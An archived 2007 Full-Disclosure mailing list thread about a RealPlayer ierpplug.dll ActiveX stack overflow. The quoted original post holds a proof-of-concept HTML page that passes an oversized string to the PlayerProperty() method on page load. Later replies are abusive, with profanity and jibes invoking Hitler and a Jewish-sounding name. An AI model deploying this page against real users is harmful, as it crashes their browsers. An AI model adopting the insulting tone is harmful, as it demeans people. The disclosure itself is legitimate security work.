Re: UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows

["Joey Mengele" <joey.mengele () hushmail com>]

LOLOLOLOL ok you win, client side denial of service warrants your 5 
electronic mail messages with up to the minute updates. I bet this 
one will be exploited in the wild!

Get a life LOLOL!

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
<elazarb () earthlink net> wrote:
> "Stack Overflow" - learn to read. A DoS attack still has some 
> security implications...
>
> -----Original Message-----
> > From: Joey Mengele <joey.mengele () hushmail com>
> > Sent: Nov 27, 2007 1:05 AM
> > To: full-disclosure () lists grok org uk, elazarb () earthlink net
> > Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer 
> ierpplug.dll ActiveX Control Multiple Stack Overflows
> > Holy mother of Hitler will you shut the fuck up already. This is 
> a 
> > "stack overflow" not a "stack based buffer overflow". There are 
> no 
> > security implications here. You are worse than Jewha Mati Laurio. 
>
> > Elazar, please do not post to this list again. Please leave the 
> > trolling to the professionals.
> >
> > J
> >
> > P.S. Sorry for the swear words John.
> >
> > On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
> > <elazarb () earthlink net> wrote:
> > > After some creative Googling, I am revising my original post. I 
> > > believe that the Import() method overflow that I originally 
> posted 
> > > is really http://www.securityfocus.com/bid/26130, although I am 
> > > not sure why Linux is listed under the "Vulnerable" section, so 
> I 
> > > am taking it out of the PoC code. Real claims to have patched 
> this 
> > > back in October, but I can still throw a stack overflow 
> exception 
> > > via this function using the originally stated version of 
> > > RealPlayer(which I installed last night). I am now listing this 
> > > vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX 
> > > Control PlayerProperty() Method Stack Overflow, and it might be 
> > > wise to list this under a separate BID. PoC as follows:
> > >
> > > -------------
> > > <!--
> > > written by e.b.
> > > -->
> > > <html>
> > > <head>
> > >  <script language="JavaScript" DEFER>
> > >    function Check() {
> > >    var s = "AAAA";
> > >
> > >    while (s.length < 999999) s=s+s;
> > >
> > >     var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-
>
> > > 4070-4B92-A0EA-D9994BCC0DC5}
> > >   
> > >      var obj2 = obj.PlayerProperty(s);
> > >
> > >
> > >   }
> > >  </script>
> > >
> > > </head>
> > > <body onload="JavaScript: return Check();">
> > >
> > > </body>
> > > </html> 
> > > -------------
> > >
> > > Elazar
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> > --
> > Click for your daily horoscope, learn about money, love & family.
> > http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF
> rqMryjXVt31vg2H7tNd/
> >

--
Click for your daily horoscope, learn about money, love & family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/